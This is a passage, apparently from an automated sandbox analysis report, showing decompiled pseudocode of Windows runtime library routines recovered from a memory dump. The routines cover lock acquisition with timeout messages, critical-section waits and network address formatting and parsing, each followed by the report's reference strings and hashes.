                                  															_t63 = E0258F970( *((intOrPtr*)(_t138 + 0x20)));
                                  															__eflags = _t63;
                                  															if(__eflags >= 0) {
                                  																goto L2;
                                  															} else {
                                  																_push(_t63);
                                  																_t66 = E025D3915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                  																asm("int3");
                                  																while(1) {
                                  																	_t110 = _t66;
                                  																	__eflags = _t66 - 1;
                                  																	if(_t66 != 1) {
                                  																		break;
                                  																	}
                                  																	_t128 = _t128 | 0xffffffff;
                                  																	_t66 = _t110;
                                  																	asm("lock cmpxchg [ebx], edi");
                                  																	__eflags = _t66 - _t110;
                                  																	if(_t66 != _t110) {
                                  																		continue;
                                  																	} else {
                                  																		_t67 =  *[fs:0x18];
                                  																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                  																		return _t67;
                                  																	}
                                  																	goto L58;
                                  																}
                                  																E025B5329(_t110, _t138);
                                  																return E025B53A5(_t138, 1);
                                  															}
                                  														}
                                  													}
                                  												}
                                  											} else {
                                  												_t56 =  *(_t96 + 0x28);
                                  												goto L3;
                                  											}
                                  										} else {
                                  											_t107 =  *_t119;
                                  											__eflags = _t107;
                                  											if(__eflags > 0) {
                                  												while(1) {
                                  													_t81 = _t107;
                                  													asm("lock cmpxchg [edi], esi");
                                  													__eflags = _t81 - _t107;
                                  													if(_t81 == _t107) {
                                  														break;
                                  													}
                                  													_t107 = _t81;
                                  													__eflags = _t81;
                                  													if(_t81 > 0) {
                                  														continue;
                                  													}
                                  													break;
                                  												}
                                  												_t56 = _a4;
                                  												__eflags = _t107;
                                  											}
                                  											if(__eflags != 0) {
                                  												while(1) {
                                  													L3:
                                  													__eflags = _t56;
                                  													if(_t56 != 0) {
                                  														goto L32;
                                  													}
                                  													_t107 = _t107 | 0xffffffff;
                                  													_t56 = 0;
                                  													asm("lock cmpxchg [edx], ecx");
                                  													__eflags = 0;
                                  													if(0 != 0) {
                                  														continue;
                                  													} else {
                                  														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                  														return 1;
                                  													}
                                  													goto L58;
                                  												}
                                  												continue;
                                  											} else {
                                  												goto L40;
                                  											}
                                  										}
                                  										goto L58;
                                  									}
                                  									__eflags = 0;
                                  									return 0;
                                  								} else {
                                  									_t115 =  *(_t96 + 0x28);
                                  									continue;
                                  								}
                                  							} else {
                                  								_t106 =  *_t49;
                                  								__eflags = _t106;
                                  								if(__eflags > 0) {
                                  									while(1) {
                                  										_t93 = _t106;
                                  										asm("lock cmpxchg [edi], esi");
                                  										__eflags = _t93 - _t106;
                                  										if(_t93 == _t106) {
                                  											break;
                                  										}
                                  										_t106 = _t93;
                                  										__eflags = _t93;
                                  										if(_t93 > 0) {
                                  											continue;
                                  										}
                                  										break;
                                  									}
                                  									__eflags = _t106;
                                  								}
                                  								if(__eflags != 0) {
                                  									continue;
                                  								} else {
                                  									goto L23;
                                  								}
                                  							}
                                  						}
                                  						goto L58;
                                  					}
                                  					_t84 = _t115;
                                  					asm("lock cmpxchg [esi], ecx");
                                  					__eflags = _t84 - _t115;
                                  					if(_t84 != _t115) {
                                  						_t115 = _t84;
                                  						goto L7;
                                  					} else {
                                  						return 1;
                                  					}
                                  				}
                                  				L58:
                                  			}

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025F2206
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-4236105082
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E025D14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                  				signed int _v8;
                                  				char _v10;
                                  				char _v140;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t24;
                                  				void* _t26;
                                  				signed int _t29;
                                  				signed int _t34;
                                  				signed int _t40;
                                  				intOrPtr _t45;
                                  				void* _t51;
                                  				intOrPtr* _t52;
                                  				void* _t54;
                                  				signed int _t57;
                                  				void* _t58;
                                  
                                  				_t51 = __edx;
                                  				_t24 =  *0x2672088; // 0x77fdf0e4
                                  				_v8 = _t24 ^ _t57;
                                  				_t45 = _a16;
                                  				_t53 = _a4;
                                  				_t52 = _a20;
                                  				if(_a4 == 0 || _t52 == 0) {
                                  					L10:
                                  					_t26 = 0xc000000d;
                                  				} else {
                                  					if(_t45 == 0) {
                                  						if( *_t52 == _t45) {
                                  							goto L3;
                                  						} else {
                                  							goto L10;
                                  						}
                                  					} else {
                                  						L3:
                                  						_t28 =  &_v140;
                                  						if(_a12 != 0) {
                                  							_push("[");
                                  							_push(0x41);
                                  							_push( &_v140);
                                  							_t29 = E025C7707();
                                  							_t58 = _t58 + 0xc;
                                  							_t28 = _t57 + _t29 * 2 - 0x88;
                                  						}
                                  						_t54 = E025D13CB(_t53, _t28);
                                  						if(_a8 != 0) {
                                  							_t34 = E025C7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                  							_t58 = _t58 + 0x10;
                                  							_t54 = _t54 + _t34 * 2;
                                  						}
                                  						if(_a12 != 0) {
                                  							_t40 = E025C7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                  							_t58 = _t58 + 0x10;
                                  							_t54 = _t54 + _t40 * 2;
                                  						}
                                  						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                  						 *_t52 = _t53;
                                  						if( *_t52 < _t53) {
                                  							goto L10;
                                  						} else {
                                  							E02592340(_t45,  &_v140, _t53 + _t53);
                                  							_t26 = 0;
                                  						}
                                  					}
                                  				}
                                  				return E0259E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                  			}

                                  APIs
                                  • ___swprintf_l.LIBCMT ref: 025FEA22
                                    • Part of subcall function 025D13CB: ___swprintf_l.LIBCMT ref: 025D146B
                                    • Part of subcall function 025D13CB: ___swprintf_l.LIBCMT ref: 025D1490
                                  • ___swprintf_l.LIBCMT ref: 025D156D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 44%
                                  			E025B53A5(signed int _a4, char _a8) {
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t32;
                                  				signed int _t37;
                                  				signed int _t40;
                                  				signed int _t42;
                                  				void* _t45;
                                  				intOrPtr _t46;
                                  				signed int _t49;
                                  				void* _t51;
                                  				signed int _t57;
                                  				signed int _t64;
                                  				signed int _t71;
                                  				void* _t74;
                                  				intOrPtr _t78;
                                  				signed int* _t79;
                                  				void* _t85;
                                  				signed int _t86;
                                  				signed int _t92;
                                  				void* _t104;
                                  				void* _t105;
                                  
                                  				_t64 = _a4;
                                  				_t32 =  *(_t64 + 0x28);
                                  				_t71 = _t64 + 0x28;
                                  				_push(_t92);
                                  				if(_t32 < 0) {
                                  					_t78 =  *[fs:0x18];
                                  					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                  					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                  						goto L3;
                                  					} else {
                                  						__eflags = _t32 | 0xffffffff;
                                  						asm("lock xadd [ecx], eax");
                                  						return 1;
                                  					}
                                  				} else {
                                  					L3:
                                  					_push(_t86);
                                  					while(1) {
                                  						L4:
                                  						__eflags = _t32;
                                  						if(_t32 == 0) {
                                  							break;
                                  						}
                                  						__eflags = _a8;
                                  						if(_a8 == 0) {
                                  							__eflags = 0;
                                  							return 0;
                                  						} else {
                                  							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                  							_t79 = _t64 + 0x24;
                                  							_t71 = 1;
                                  							asm("lock xadd [eax], ecx");
                                  							_t32 =  *(_t64 + 0x28);
                                  							_a4 = _t32;
                                  							__eflags = _t32;
                                  							if(_t32 != 0) {
                                  								L19:
                                  								_t86 = 0;
                                  								__eflags = 0;
                                  								while(1) {
                                  									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                  									asm("sbb esi, esi");
                                  									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x026701c0;
                                  									_push(_t92);
                                  									_push(0);
                                  									_t37 = E0258F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                  									__eflags = _t37 - 0x102;
                                  									if(_t37 != 0x102) {
                                  										break;
                                  									}
                                  									_t71 =  *(_t92 + 4);
                                  									_t85 =  *_t92;
                                  									_t51 = E025D4FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                  									_push(_t85);
                                  									_push(_t51);
                                  									E025E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                  									E025E3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                  									_t86 = _t86 + 1;
                                  									_t105 = _t104 + 0x28;
                                  									__eflags = _t86 - 2;
                                  									if(__eflags > 0) {
                                  										E0261217A(_t71, __eflags, _t64);
                                  									}
                                  									_push("RTL: Re-Waiting\n");
                                  									_push(0);
                                  									_push(0x65);
                                  									E025E3F92();
                                  									_t104 = _t105 + 0xc;
                                  								}
                                  								__eflags = _t37;
                                  								if(__eflags < 0) {
                                  									_push(_t37);
                                  									E025D3915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                  									asm("int3");
                                  									_t40 =  *_t71;
                                  									 *_t71 = 0;
                                  									__eflags = _t40;
                                  									if(_t40 == 0) {
                                  										L1:
                                  										_t42 = E025B5384(_t92 + 0x24);
                                  										if(_t42 != 0) {
                                  											goto L31;
                                  										} else {
                                  											goto L2;
                                  										}
                                  									} else {
                                  										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                  										_push( &_a4);
                                  										_push(_t40);
                                  										_t49 = E0258F970( *((intOrPtr*)(_t92 + 0x18)));
                                  										__eflags = _t49;
                                  										if(__eflags >= 0) {
                                  											goto L1;
                                  										} else {
                                  											_push(_t49);
                                  											E025D3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                  											L31:
                                  											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                  											_push( &_a4);
                                  											_push(1);
                                  											_t42 = E0258F970( *((intOrPtr*)(_t92 + 0x20)));
                                  											__eflags = _t42;
                                  											if(__eflags >= 0) {
                                  												L2:
                                  												return _t42;
                                  											} else {
                                  												_push(_t42);
                                  												E025D3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                  												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                  												_push( &_a4);
                                  												_push(1);
                                  												_t42 = E0258F970( *((intOrPtr*)(_t92 + 0x20)));
                                  												__eflags = _t42;
                                  												if(__eflags >= 0) {
                                  													goto L2;
                                  												} else {
                                  													_push(_t42);
                                  													_t45 = E025D3915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                  													asm("int3");
                                  													while(1) {
                                  														_t74 = _t45;
                                  														__eflags = _t45 - 1;
                                  														if(_t45 != 1) {
                                  															break;
                                  														}
                                  														_t86 = _t86 | 0xffffffff;
                                  														_t45 = _t74;
                                  														asm("lock cmpxchg [ebx], edi");
                                  														__eflags = _t45 - _t74;
                                  														if(_t45 != _t74) {
                                  															continue;
                                  														} else {
                                  															_t46 =  *[fs:0x18];
                                  															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                  															return _t46;
                                  														}
                                  														goto L37;
                                  													}
                                  													E025B5329(_t74, _t92);
                                  													_push(1);
                                  													return E025B53A5(_t92);
                                  												}
                                  											}
                                  										}
                                  									}
                                  								} else {
                                  									_t32 =  *(_t64 + 0x28);
                                  									continue;
                                  								}
                                  							} else {
                                  								_t71 =  *_t79;
                                  								__eflags = _t71;
                                  								if(__eflags > 0) {
                                  									while(1) {
                                  										_t57 = _t71;
                                  										asm("lock cmpxchg [edi], esi");
                                  										__eflags = _t57 - _t71;
                                  										if(_t57 == _t71) {
                                  											break;
                                  										}
                                  										_t71 = _t57;
                                  										__eflags = _t57;
                                  										if(_t57 > 0) {
                                  											continue;
                                  										}
                                  										break;
                                  									}
                                  									_t32 = _a4;
                                  									__eflags = _t71;
                                  								}
                                  								if(__eflags != 0) {
                                  									continue;
                                  								} else {
                                  									goto L19;
                                  								}
                                  							}
                                  						}
                                  						goto L37;
                                  					}
                                  					_t71 = _t71 | 0xffffffff;
                                  					_t32 = 0;
                                  					asm("lock cmpxchg [edx], ecx");
                                  					__eflags = 0;
                                  					if(0 != 0) {
                                  						goto L4;
                                  					} else {
                                  						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                  						return 1;
                                  					}
                                  				}
                                  				L37:
                                  			}

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025F22F4
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 025F2328
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 025F22FC
                                  • RTL: Resource at %p, xrefs: 025F230B
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-871070163
                                  • Opcode ID: e4d12a29f9477b8b42ee75b64bc0176bc2bcb4bcf4a36dd4252c3f151132c5c7
                                  • Instruction ID: 007e2638ed58a02b8f00de3d383e54a996029c942ba36c206b65ec32ec6c149f
                                  • Opcode Fuzzy Hash: e4d12a29f9477b8b42ee75b64bc0176bc2bcb4bcf4a36dd4252c3f151132c5c7
                                  • Instruction Fuzzy Hash: E751F8B16116066BEF15DF68CC80FA67799FF88324F104659FD19DB280F761E8418BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 51%
                                  			E025BEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				signed int _v24;
                                  				intOrPtr* _v28;
                                  				intOrPtr _v32;
                                  				signed int _v36;
                                  				intOrPtr _v40;
                                  				short _v66;
                                  				char _v72;
                                  				void* __esi;
                                  				intOrPtr _t38;
                                  				intOrPtr _t39;
                                  				signed int _t40;
                                  				intOrPtr _t42;
                                  				intOrPtr _t43;
                                  				signed int _t44;
                                  				void* _t46;
                                  				intOrPtr _t48;
                                  				signed int _t49;
                                  				intOrPtr _t50;
                                  				intOrPtr _t53;
                                  				signed char _t67;
                                  				void* _t72;
                                  				intOrPtr _t77;
                                  				intOrPtr* _t80;
                                  				intOrPtr _t84;
                                  				intOrPtr* _t85;
                                  				void* _t91;
                                  				void* _t92;
                                  				void* _t93;
                                  
                                  				_t80 = __edi;
                                  				_t75 = __edx;
                                  				_t70 = __ecx;
                                  				_t84 = _a4;
                                  				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                  					E025ADA92(__ecx, __edx, __eflags, _t84);
                                  					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                  				}
                                  				_push(0);
                                  				__eflags = _t38 - 0xffffffff;
                                  				if(_t38 == 0xffffffff) {
                                  					_t39 =  *0x267793c; // 0x0
                                  					_push(0);
                                  					_push(_t84);
                                  					_t40 = E025916C0(_t39);
                                  				} else {
                                  					_t40 = E0258F9D4(_t38);
                                  				}
                                  				_pop(_t85);
                                  				__eflags = _t40;
                                  				if(__eflags < 0) {
                                  					_push(_t40);
                                  					E025D3915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                  					asm("int3");
                                  					while(1) {
                                  						L21:
                                  						_t76 =  *[fs:0x18];
                                  						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                  						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                  						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                  							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                  							_v66 = 0x1722;
                                  							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                  							_t76 =  &_v72;
                                  							_push( &_v72);
                                  							_v28 = _t85;
                                  							_v40 =  *((intOrPtr*)(_t85 + 4));
                                  							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                  							_push(0x10);
                                  							_push(0x20402);
                                  							E025901A4( *0x7ffe0382 & 0x000000ff);
                                  						}
                                  						while(1) {
                                  							_t43 = _v8;
                                  							_push(_t80);
                                  							_push(0);
                                  							__eflags = _t43 - 0xffffffff;
                                  							if(_t43 == 0xffffffff) {
                                  								_t71 =  *0x267793c; // 0x0
                                  								_push(_t85);
                                  								_t44 = E02591F28(_t71);
                                  							} else {
                                  								_t44 = E0258F8CC(_t43);
                                  							}
                                  							__eflags = _t44 - 0x102;
                                  							if(_t44 != 0x102) {
                                  								__eflags = _t44;
                                  								if(__eflags < 0) {
                                  									_push(_t44);
                                  									E025D3915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                  									asm("int3");
                                  									E02612306(_t85);
                                  									__eflags = _t67 & 0x00000002;
                                  									if((_t67 & 0x00000002) != 0) {
                                  										_t7 = _t67 + 2; // 0x4
                                  										_t72 = _t7;
                                  										asm("lock cmpxchg [edi], ecx");
                                  										__eflags = _t67 - _t67;
                                  										if(_t67 == _t67) {
                                  											E025BEC56(_t72, _t76, _t80, _t85);
                                  										}
                                  									}
                                  									return 0;
                                  								} else {
                                  									__eflags = _v24;
                                  									if(_v24 != 0) {
                                  										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                  									}
                                  									return 2;
                                  								}
                                  								goto L36;
                                  							}
                                  							_t77 =  *((intOrPtr*)(_t80 + 4));
                                  							_push(_t67);
                                  							_t46 = E025D4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                  							_push(_t77);
                                  							E025E3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                  							_t48 =  *_t85;
                                  							_t92 = _t91 + 0x18;
                                  							__eflags = _t48 - 0xffffffff;
                                  							if(_t48 == 0xffffffff) {
                                  								_t49 = 0;
                                  								__eflags = 0;
                                  							} else {
                                  								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                  							}
                                  							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                  							_push(_t49);
                                  							_t50 = _v12;
                                  							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                  							_push(_t85);
                                  							_push( *((intOrPtr*)(_t85 + 0xc)));
                                  							_push( *((intOrPtr*)(_t50 + 0x24)));
                                  							E025E3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                  							_t53 =  *_t85;
                                  							_t93 = _t92 + 0x20;
                                  							_t67 = _t67 + 1;
                                  							__eflags = _t53 - 0xffffffff;
                                  							if(_t53 != 0xffffffff) {
                                  								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                  								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                  							}
                                  							__eflags = _t67 - 2;
                                  							if(_t67 > 2) {
                                  								__eflags = _t85 - 0x26720c0;
                                  								if(_t85 != 0x26720c0) {
                                  									_t76 = _a4;
                                  									__eflags = _a4 - _a8;
                                  									if(__eflags == 0) {
                                  										E0261217A(_t71, __eflags, _t85);
                                  									}
                                  								}
                                  							}
                                  							_push("RTL: Re-Waiting\n");
                                  							_push(0);
                                  							_push(0x65);
                                  							_a8 = _a4;
                                  							E025E3F92();
                                  							_t91 = _t93 + 0xc;
                                  							__eflags =  *0x7ffe0382;
                                  							if( *0x7ffe0382 != 0) {
                                  								goto L21;
                                  							}
                                  						}
                                  						goto L36;
                                  					}
                                  				} else {
                                  					return _t40;
                                  				}
                                  				L36:
                                  			}

                                  Strings
                                  • RTL: Re-Waiting, xrefs: 025F24FA
                                  • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 025F248D
                                  • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 025F24BD
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                  • API String ID: 0-3177188983
                                  • Opcode ID: 24b091bd71a486427692f121ee1a3adf808841161547f0f1e85a86502133c496
                                  • Instruction ID: 10391aab37d86ac0652d09d32415b239b22b634e75c2ce8edc16df85a81aa95b
                                  • Opcode Fuzzy Hash: 24b091bd71a486427692f121ee1a3adf808841161547f0f1e85a86502133c496
                                  • Instruction Fuzzy Hash: 0441EDB0600205ABDB24DF64CC89FAA77A9FF84720F148A05F959DB2C0D774E941CB6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E025CFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				signed int _t105;
                                  				void* _t110;
                                  				char _t114;
                                  				short _t115;
                                  				void* _t118;
                                  				signed short* _t119;
                                  				short _t120;
                                  				char _t122;
                                  				void* _t127;
                                  				void* _t130;
                                  				signed int _t136;
                                  				intOrPtr _t143;
                                  				signed int _t158;
                                  				signed short* _t164;
                                  				signed int _t167;
                                  				void* _t170;
                                  
                                  				_t158 = 0;
                                  				_t164 = _a4;
                                  				_v20 = 0;
                                  				_v24 = 0;
                                  				_v8 = 0;
                                  				_v12 = 0;
                                  				_v16 = 0;
                                  				_v28 = 0;
                                  				_t136 = 0;
                                  				while(1) {
                                  					_t167 =  *_t164 & 0x0000ffff;
                                  					if(_t167 == _t158) {
                                  						break;
                                  					}
                                  					_t118 = _v20 - _t158;
                                  					if(_t118 == 0) {
                                  						if(_t167 == 0x3a) {
                                  							if(_v12 > _t158 || _v8 > _t158) {
                                  								break;
                                  							} else {
                                  								_t119 =  &(_t164[1]);
                                  								if( *_t119 != _t167) {
                                  									break;
                                  								}
                                  								_t143 = 2;
                                  								 *((short*)(_a12 + _t136 * 2)) = 0;
                                  								_v28 = 1;
                                  								_v8 = _t143;
                                  								_t136 = _t136 + 1;
                                  								L47:
                                  								_t164 = _t119;
                                  								_v20 = _t143;
                                  								L14:
                                  								if(_v24 == _t158) {
                                  									L19:
                                  									_t164 =  &(_t164[1]);
                                  									_t158 = 0;
                                  									continue;
                                  								}
                                  								if(_v12 == _t158) {
                                  									if(_v16 > 4) {
                                  										L29:
                                  										return 0xc000000d;
                                  									}
                                  									_t120 = E025CEE02(_v24, _t158, 0x10);
                                  									_t170 = _t170 + 0xc;
                                  									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                  									_t136 = _t136 + 1;
                                  									goto L19;
                                  								}
                                  								if(_v16 > 3) {
                                  									goto L29;
                                  								}
                                  								_t122 = E025CEE02(_v24, _t158, 0xa);
                                  								_t170 = _t170 + 0xc;
                                  								if(_t122 > 0xff) {
                                  									goto L29;
                                  								}
                                  								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                  								goto L19;
                                  							}
                                  						}
                                  						L21:
                                  						if(_v8 > 7 || _t167 >= 0x80) {
                                  							break;
                                  						} else {
                                  							if(E025C685D(_t167, 4) == 0) {
                                  								if(E025C685D(_t167, 0x80) != 0) {
                                  									if(_v12 > 0) {
                                  										break;
                                  									}
                                  									_t127 = 1;
                                  									_a7 = 1;
                                  									_v24 = _t164;
                                  									_v20 = 1;
                                  									_v16 = 1;
                                  									L36:
                                  									if(_v20 == _t127) {
                                  										goto L19;
                                  									}
                                  									_t158 = 0;
                                  									goto L14;
                                  								}
                                  								break;
                                  							}
                                  							_a7 = 0;
                                  							_v24 = _t164;
                                  							_v20 = 1;
                                  							_v16 = 1;
                                  							goto L19;
                                  						}
                                  					}
                                  					_t130 = _t118 - 1;
                                  					if(_t130 != 0) {
                                  						if(_t130 == 1) {
                                  							goto L21;
                                  						}
                                  						_t127 = 1;
                                  						goto L36;
                                  					}
                                  					if(_t167 >= 0x80) {
                                  						L7:
                                  						if(_t167 == 0x3a) {
                                  							_t158 = 0;
                                  							if(_v12 > 0 || _v8 > 6) {
                                  								break;
                                  							} else {
                                  								_t119 =  &(_t164[1]);
                                  								if( *_t119 != _t167) {
                                  									_v8 = _v8 + 1;
                                  									L13:
                                  									_v20 = _t158;
                                  									goto L14;
                                  								}
                                  								if(_v28 != 0) {
                                  									break;
                                  								}
                                  								_v28 = _v8 + 1;
                                  								_t143 = 2;
                                  								_v8 = _v8 + _t143;
                                  								goto L47;
                                  							}
                                  						}
                                  						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                  							break;
                                  						} else {
                                  							_v12 = _v12 + 1;
                                  							_t158 = 0;
                                  							goto L13;
                                  						}
                                  					}
                                  					if(E025C685D(_t167, 4) != 0) {
                                  						_v16 = _v16 + 1;
                                  						goto L19;
                                  					}
                                  					if(E025C685D(_t167, 0x80) != 0) {
                                  						_v16 = _v16 + 1;
                                  						if(_v12 > 0) {
                                  							break;
                                  						}
                                  						_a7 = 1;
                                  						goto L19;
                                  					}
                                  					goto L7;
                                  				}
                                  				 *_a8 = _t164;
                                  				if(_v12 != 0) {
                                  					if(_v12 != 3) {
                                  						goto L29;
                                  					}
                                  					_v8 = _v8 + 1;
                                  				}
                                  				if(_v28 != 0 || _v8 == 7) {
                                  					if(_v20 != 1) {
                                  						if(_v20 != 2) {
                                  							goto L29;
                                  						}
                                  						 *((short*)(_a12 + _t136 * 2)) = 0;
                                  						L65:
                                  						_t105 = _v28;
                                  						if(_t105 != 0) {
                                  							_t98 = (_t105 - _v8) * 2; // 0x11
                                  							E025A8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                  							_t110 = 8;
                                  							E0259DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                  						}
                                  						return 0;
                                  					}
                                  					if(_v12 != 0) {
                                  						if(_v16 > 3) {
                                  							goto L29;
                                  						}
                                  						_t114 = E025CEE02(_v24, 0, 0xa);
                                  						_t170 = _t170 + 0xc;
                                  						if(_t114 > 0xff) {
                                  							goto L29;
                                  						}
                                  						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                  						goto L65;
                                  					}
                                  					if(_v16 > 4) {
                                  						goto L29;
                                  					}
                                  					_t115 = E025CEE02(_v24, 0, 0x10);
                                  					_t170 = _t170 + 0xc;
                                  					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                  					goto L65;
                                  				} else {
                                  					goto L29;
                                  				}
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: __fassign
                                  • String ID:
                                  • API String ID: 3965848254-0
